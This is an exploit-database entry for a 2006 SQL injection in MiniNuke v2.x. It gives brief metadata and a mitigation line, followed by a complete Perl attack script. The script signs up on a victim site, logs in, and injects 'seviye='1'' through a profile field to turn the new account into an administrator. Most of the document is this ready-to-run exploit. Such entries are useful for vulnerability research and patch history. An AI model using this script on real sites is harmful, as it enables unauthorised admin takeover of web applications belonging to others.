MiniNuke v2.x Remote SQL Injection (create an admin) Exploit

vendor:

MiniNuke

by:

nukedx

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: MiniNuke

Affected Version From: 2.x

Affected Version To: 2.x

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

MiniNuke v2.x Remote SQL Injection (create an admin) Exploit

This exploit allows an attacker to create an admin account on MiniNuke v2.x by exploiting a SQL injection vulnerability. The attacker needs to provide the victim's host, path to MiniNuke, desired username, password and mail for the username. The exploit then gets the session and security code from the victim's host and registers the admin account.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket;
if(@ARGV != 5) { usage(); }
else { exploit(); }
sub header()
{
  print "\n- NukedX Security Advisory Nr.2006-31\r\n";
  print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
}
sub usage() 
{
  header();
  print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
  print "- <host> -> Victim's host ex: www.victim.com\r\n";
  print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
  print "- <user> -> Desired username to create ex: h4x0r\r\n";
  print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
  print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
  exit();
}
sub exploit () 
{
  #Our variables...
  $mnserver = $ARGV[0];
  $mnserver =~ s/(http:\/\/)//eg;
  $mnhost   = "http://".$mnserver;
  $mndir    = $ARGV[1];
  $mnuser   = $ARGV[2];
  $mnpass   = $ARGV[3];
  $mnmail   = $ARGV[4];
  $mnport   = "80";
  #Sending data...
  header();
  print "- Trying to connect: $mnserver\r\n";
  getsession();
}
sub getsession ()
{
  print "- Getting session for register...\r\n";
  $mnstar   = "membership.asp?action=new";
  $mnsreq   = $mnhost.$mndir.$mnstar;
  $mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
  print $mns "GET $mnsreq HTTP/1.1\n";
  print $mns "Accept: */*\n";
  print $mns "Referer: $mnhost\n";
  print $mns "Accept-Language: tr\n";
  print $mns "User-Agent: NukeZilla\n";
  print $mns "Cache-Control: no-cache\n";
  print $mns "Host: $mnserver\n";
  print $mns "Connection: close\n\n";
  print "- Connected...\r\n";
  while ($answer = <$mns>) { 
    if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
    if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
  }
  #if you are here...
  die "- Exploit failed\r\n";
}
sub doregister ()
{
  close($mns);
  $mntar    = "membership.asp?action=register";
  $mnreq    = $mnhost.$mndir.$mntar;
  print "- Session getting done\r\n";
  print "- Lets create our user...\r\n";
  $mndata = "kuladi=".$mnuser;
  $mndata.= "&password=".$mnpass;
  $mndata.= "&email=".$mnmail;
  $mndata.= "&isim=h4x0r";
  $mndata.= "&g_soru=whooooo";
  $mndata.= "&g_cevap=h4x0rs";
  $mndata.= "&icq=1";
  $mndata.= "&msn=1";
  $mndata.= "&aim=1";
  $mndata.= "&sehir=1";
  $mndata.= "&meslek=1";
  $mndata.= "&cinsiyet=b";
  $mndata.= "&yas_1=1";
  $mndata.= "&yas_2=1";
  $mndata.= "&yas_3=1920";
  $mndata.= "&web=http://www.milw0rm.com";
  $mndata.= "&imza=h4x0r";
  $mndata.= "&mavatar=IMAGES/avatars/1.gif";
  $mndata.= "&security_code=".$mngvn;
  $mndata.= "&mail_goster=on";
  $mndatalen = length($mndata);
  $mn =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
  print $mn "POST $mnreq HTTP/1.1\r\n";
  print $mn "Accept: */*\r\n";
  print $mn "Referer: $mnhost\r\n";
  print $mn "Accept-Language: tr\r\n";
  print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
  print $mn "Accept-Encoding: gzip, deflate\r\n";
  print $mn "User-Agent: NukeZilla\r\n";
  print $mn "Cookie: $mncookie\r\n";
  print $mn "Host: $mnserver\r\n";
  print $mn "Content-length: $mndatalen\r\n";
  print $mn "Connection: Keep-Alive\r\n";
  print $mn "Cache-Control: no-cache\r\n\r\n";
  print $mn $mndata;
  print $mn "\r\n\r\n";
  while ($answer = <$mn>) { 
    if ($answer =~ /Tebrikler !!!/) { 
      print "- Creating user has been done...\r\n"; 
      print "- Loginning in to user...\r\n";
      dologin();
    }
  }
  #if you are here...
  die "- Exploit failed\r\n";
}
sub dologin ()
{
  close ($mn);
  $mnltar  = "enter.asp";
  $mnlreq  = $mnhost.$mndir.$mnltar;
  $mnldata = "kuladi=".$mnuser;
  $mnldata.= "&password=".$mnpass;
  $mnldata.= "&guvenlik=423412";
  $mnldata.= "&gguvenlik=423412";
  $mnldatalen = length($mnldata);
  $mnl =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
  print $mnl "POST $mnlreq HTTP/1.1\r\n";
  print $mnl "Accept: */*\r\n";
  print $mnl "Referer: $mnhost\r\n";
  print $mnl "Accept-Language: tr\r\n";
  print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
  print $mnl "Accept-Encoding: gzip, deflate\r\n";
  print $mnl "User-Agent: NukeZilla\r\n";
  print $mnl "Host: $mnserver\r\n";
  print $mnl "Content-length: $mnldatalen\r\n";
  print $mnl "Connection: Keep-Alive\r\n";
  print $mnl "Cache-Control: no-cache\r\n\r\n";
  print $mnl $mnldata;
  print $mnl "\r\n\r\n";
  while ($answer = <$mnl>) { 
    if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
    if ($answer =~ /Cache-control:/) { doadmin(); }
   }
  #if you are here...
  die "- Exploit failed\r\n";
}
sub doadmin ()
{
  close($mnl);
  print "- Editing profile..\r\n";
  $mnptar  = "Your_Account.asp?op=UpdateProfile";
  $mnpreq  = $mnhost.$mndir.$mnptar;
  $mnpdata.= "email=".$mnmail;
  $mnpdata.= "&isim=h4x0r";
  $mnpdata.= "&g_soru=whooooo";
  $mnpdata.= "&g_cevap=h4x0rs";
  $mnpdata.= "&icq=1";
  $mnpdata.= "&msn=1";
  $mnpdata.= "&aim=1";
  $mnpdata.= "&sehir=1";
  $mnpdata.= "&meslek=1";
  $mnpdata.= "&cinsiyet=b";
  $mnpdata.= "&yas_1=1";
  $mnpdata.= "&yas_2=1";
  $mnpdata.= "&yas_3=1920',seviye='1";
  $mnpdata.= "&web=http://www.milw0rm.com";
  $mnpdata.= "&imza=h4x0r";
  $mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
  $mnpdata.= "&mail_goster=on";
  $mnpdatalen = length($mnpdata);
  $mnp =  IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
  print $mnp "POST $mnpreq HTTP/1.1\r\n";
  print $mnp "Accept: */*\r\n";
  print $mnp "Referer: $mnhost\r\n";
  print $mnp "Accept-Language: tr\r\n";
  print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
  print $mnp "Accept-Encoding: gzip, deflate\r\n";
  print $mnp "User-Agent: NukeZilla\r\n";
  print $mnp "Cookie: $mnlcookie\r\n";
  print $mnp "Host: $mnserver\r\n";
  print $mnp "Content-length: $mnpdatalen\r\n";
  print $mnp "Connection: Keep-Alive\r\n";
  print $mnp "Cache-Control: no-cache\r\n\r\n";
  print $mnp $mnpdata;
  print $mn "\r\n\r\n";
  while ($answer = <$mnp>) { 
    if ($answer =~ /Tebrikler !!!/) { 
      print "- Editing profile been done...\r\n"; 
      print "- Exploiting finished succesfully\r\n";
      print "- Your username $mnuser has been created as admin\r\n";
      print "- You can login with password $mnpass on $mnlreq\r\n";
      exit();
    }
    if ($answer =~ /Üyeler Açýktýr/) { 
      print "- Exploit failed\r\n";
      exit();
    }
  }
  #if you are here...
  die "- Exploit failed\r\n";
}
# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-27]